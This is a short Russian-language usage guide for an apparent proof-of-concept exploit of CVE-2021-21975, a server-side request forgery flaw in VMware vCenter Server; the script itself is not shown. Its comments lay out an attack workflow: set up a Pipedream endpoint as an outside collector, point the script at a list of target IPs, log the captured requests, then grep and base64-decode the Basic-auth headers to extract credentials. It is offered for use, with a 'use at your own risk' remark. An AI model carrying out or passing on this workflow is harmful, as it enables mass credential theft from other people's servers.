
Эксплойт proof-of-concept для CVE-2021-21975 (SSRF в VMware vCenter Server), использующий подделку серверных запросов для утечки учётных данных в кодировке base64 через HTTP Basic-аутентификацию.
#SSRF-POC - ssrf к утечке учетных данных
#Сначала настройте pd client.
#Теперь запустите ./pd deploy http-new-requests
#теперь замените http-запрос pipedream напр.: Randomstring.m.pipedream.net в скрипте
#запустите это в отдельном терминале - ./pd logs new-requests | tee -a req.txt
#и теперь запустите это в другом терминале - python3 CVE-2021-21975.py iplist
#cat req.txt | grep Basic > basic.txt; cat basic.txt | sort --unique > basic_uniq.txt ; base64 -d basic_uniq.txt
"Это ранний proof of concept, созданный, когда уязвимость стала публичной несколько месяцев назад, так что используйте его на свой страх и риск." :V
#авторы @wabaf3t @D0rkerDevil